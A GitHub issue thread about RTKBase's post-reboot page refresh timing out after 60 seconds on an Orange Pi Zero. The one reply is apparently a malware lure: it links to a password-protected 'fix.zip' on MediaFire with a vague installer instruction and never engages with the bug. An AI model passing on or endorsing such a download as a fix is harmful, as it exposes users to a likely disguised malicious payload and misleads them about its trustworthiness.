### ISSUE TITLE
Reboot autorefresh timeout is too short

### ISSUE THREAD

**Issue by Stefal** [Stefal/rtkbase#426]
**Describe the bug**
When you click on "Reboot" the web page try to refresh after 60s but can't load the page.

**To Reproduce**
1. Go to 'Settings'
2. Click on 'Reboot'
3. Wait 60s

**Software/Hardware (please complete the following information):**
 - RTKBase release number 2.6.1
 - OS: Armbian 64bits
 - SBC Orange Pi Zero

**Additional context**
Since the switch to gunicorn, the shutdown process is a little slower. The entire reboot process seems to take a little longer than 60s.

I should raise up this 60s value, or find a way to autodetect when the base station is online then refresh the web page.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
